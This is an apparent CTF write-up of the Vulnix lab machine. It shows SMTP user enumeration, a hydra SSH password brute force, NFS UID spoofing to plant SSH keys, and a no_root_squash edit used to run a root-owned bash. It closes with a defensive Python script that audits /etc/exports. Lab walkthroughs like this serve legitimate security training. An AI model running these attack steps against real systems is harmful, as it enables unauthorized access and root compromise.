Posted in CTF

Once the IP of Vulnix is obtained (nmap -sP), our initial nmap scan is run…

22/tcp    open     ssh            OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open     smtp           Postfix smtpd
79/tcp    open     finger         Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open     pop3           Dovecot pop3d
111/tcp   open     rpcbind        2-4 (RPC #100000)
143/tcp   open     imap           Dovecot imapd
512/tcp   open     exec           netkit-rsh rexecd
513/tcp   open     login          OpenBSD or Solaris rlogind
514/tcp   open     tcpwrapped

A few that catch our attention: SMTP/pop3, rpcbind & SSH.

Since VRFY is available, we can do some quick SMTP user enumeration.

root@kali:~# smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t

We see root as a valid user, along with an unusual account named: user

Using finger against user and root we are able to verify they both have /bin/bash available to them.

root@kali:~# finger user@
Login: user           			Name: user
Directory: /home/user               	Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull       			Name: Dovecot login user
Directory: /nonexistent             	Shell: /bin/false
Never logged in.

SSH allows passwords so we run a quick password attack against each user. Using a small password list, root is unsuccessful, but user gets a valid hit.

root@kali:/home# hydra -t 4 -l user -P /home/fasttrack.txt ssh 
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2017-08-14 08:27:09
[DATA] max 4 tasks per 1 server, overall 64 tasks, 182 login tries (l:1/p:182), ~0 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 118 to do in 00:02h, 4 active
[STATUS] 62.00 tries/min, 124 tries in 00:02h, 58 to do in 00:01h, 4 active
[22][ssh] host:   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2017-08-14 08:30:03


Trying multiple kernel exploits is unsuccessful, so after enumerating a bit more (/etc/passwd) another user, vulnix, is found. For now the plan will be to work on getting access to this account.

We’ll take a step back and keep in mind that we have other services exposed; we can take a closer look at rpc/nfs.

We check the mounted directories…

root@kali:~# showmount -e
Export list for
/home/vulnix *

It’s a good thing to enumerate thoroughly up front, instead of rushing down possible vectors and wasting time in rabbit holes. We could’ve seen vulnix as a user in our initial SMTP user enum scan if a little more prior enumeration had been done. Not a big deal in this case, but just a note.

root@kali:/mnt/vulnix# mount -t nfs /mnt/vulnix -nolock

We can mount this directory without a problem, but accessing it throws a permissions error. Since it’s a user’s home directory, and SSH is open, we can attempt to:

  • Create a local user on our Kali machine named vulnix. The /home/vulnix directory already exists, and we have root privileges (on our Kali machine) to create the user for the existing home folder.
  • Since we can read the victim’s /etc/passwd file, we’ll also set the UID of our local vulnix user to 2008.
  • Accessing this share will then allow us to place generated SSH keys, so we can ssh as vulnix.

First create an .ssh folder within the mounted /home/vulnix:

root@kali:/mnt/vulnix# mkdir .ssh
root@kali:/mnt/vulnix# touch .ssh/authorized_keys

Now generate the RSA key pair, and copy the public key into the authorized_keys file (sshd expects a file here, not a directory).

Now ssh as vulnix and you should get a successful login.

Enumerating as vulnix with sudo -l, we see it has sudo privileges over /etc/exports (no password required). Reading this file, something sticks out..

/home/vulnix *(rw,root_squash)
/root  *(rw, no_root_squash)

Change and save to:

/home/vulnix *(rw, no_root_squash) 

The NFS service will need to be restarted for the changes to take effect (neither vulnix nor user has permissions to do this), so reboot the VM.

Once mounted again, we can copy /bin/bash from our local Kali root account to the mounted vulnix folder. We will then be able to run that bash as root with the -p flag. Since root squashing has been disabled, running this copied root bash binary is possible. This gives full root access to the system.
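As an added defender-side example (not part of the writeup), here is a small Python audit of /etc/exports that flags the settings this escalation depended on: no_root_squash, wildcard clients, AUTH_SYS-only exports that trust the client's UID, and writable home-directory exports. The sample exports file is constructed for the example; the hardened /srv/data line is an assumption added for contrast.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the writeup's edited /etc/exports plus one hardened line for contrast.
SAMPLE_EXPORTS = """\
# constructed sample, not copied from a real host
/home/vulnix *(rw, no_root_squash)
/root  *(rw, no_root_squash)
/srv/data 10.0.0.0/24(rw,root_squash,sec=krb5p)
"""

def parse_exports(text: str) -> List[Dict]:
    """Return one record per (path, client) pair: {'path', 'client', 'options'}."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        # exports(5) allows no whitespace inside an option list; be lenient so the
        # writeup's "(rw, no_root_squash)" is still audited instead of skipped.
        rest = re.sub(r"\(([^)]*)\)", lambda m: "(" + re.sub(r"\s+", "", m.group(1)) + ")", rest)
        for token in rest.split() or ["*"]:          # no client list: audit as wildcard
            client, _, opts = token.partition("(")
            options = [o for o in opts.rstrip(")").split(",") if o]
            entries.append({"path": path, "client": client or "*", "options": options})
    return entries

def audit(entries: List[Dict]) -> List[Tuple[str, str]]:
    """Flag the export settings that the writeup's privilege escalation depended on."""
    findings = []
    for e in entries:
        opts, where = set(e["options"]), f"{e['path']} -> {e['client']}"
        if "no_root_squash" in opts:
            findings.append((where, "no_root_squash: files written by client root stay root-owned on the server"))
        if e["client"].startswith("*"):
            findings.append((where, "wildcard client: any host that can reach rpcbind/nfs may mount"))
        if not any(o.startswith("sec=") and o != "sec=sys" for o in opts):
            findings.append((where, "AUTH_SYS only: server trusts whatever UID the client presents"))
        if e["path"].startswith("/home") and "rw" in opts:
            findings.append((where, "writable home export: a matching client UID can alter the user's files"))
    return findings

if __name__ == "__main__":
    for where, msg in audit(parse_exports(SAMPLE_EXPORTS)):
        print(f"[!] {where}: {msg}")
```

Run it against a real /etc/exports by passing the file contents to parse_exports; the hardened line produces no findings because it pins the client range, keeps root_squash and requires Kerberos (sec=krb5p) instead of trusting client UIDs.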
